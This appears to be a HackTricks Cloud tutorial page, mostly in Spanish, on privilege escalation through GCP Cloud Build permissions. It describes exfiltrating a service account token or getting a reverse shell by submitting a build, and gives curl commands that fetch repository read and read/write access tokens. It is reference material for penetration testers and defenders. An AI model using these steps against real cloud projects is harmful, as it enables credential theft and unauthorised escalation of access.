GCP - Cloudbuild Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

cloudbuild

Para más información sobre Cloud Build, consulta:

GCP - Cloud Build Enum

`cloudbuild.builds.create`

Con este permiso puedes enviar un cloud build. La máquina de cloudbuild tendrá en su sistema de archivos por defecto un token de la cuenta de servicio de cloudbuild: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Sin embargo, puedes indicar cualquier cuenta de servicio dentro del proyecto en la configuración de cloudbuild. Por lo tanto, puedes hacer que la máquina exfiltre el token a tu servidor o obtener un shell reverso dentro de ella y conseguir el token (el archivo que contiene el token puede cambiar).

Puedes encontrar el script de explotación original aquí en GitHub (pero la ubicación de donde toma el token no funcionó para mí). Por lo tanto, consulta un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para obtener un shell reverso dentro de la máquina de cloudbuild y robarlo aquí (en el código puedes encontrar cómo especificar otras cuentas de servicio).

Para una explicación más detallada, visita https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

`cloudbuild.builds.update`

Potencialmente con este permiso podrás actualizar un cloud build y simplemente robar el token de la cuenta de servicio como se realizó con el permiso anterior (pero desafortunadamente en el momento de escribir esto no pude encontrar ninguna manera de llamar a esa API).

TODO

`cloudbuild.repositories.accessReadToken`

Con este permiso, el usuario puede obtener el token de acceso de lectura utilizado para acceder al repositorio:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"

`cloudbuild.repositories.accessReadWriteToken`

Con este permiso, el usuario puede obtener el token de acceso de lectura y escritura utilizado para acceder al repositorio:

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
-d '{}' \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"

`cloudbuild.connections.fetchLinkableRepositories`

Con este permiso puedes obtener los repos a los que tiene acceso la conexión:

curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousGCP - ClientAuthConfig Privesc NextGCP - Cloudfunctions Privesc

Last updated 1 month ago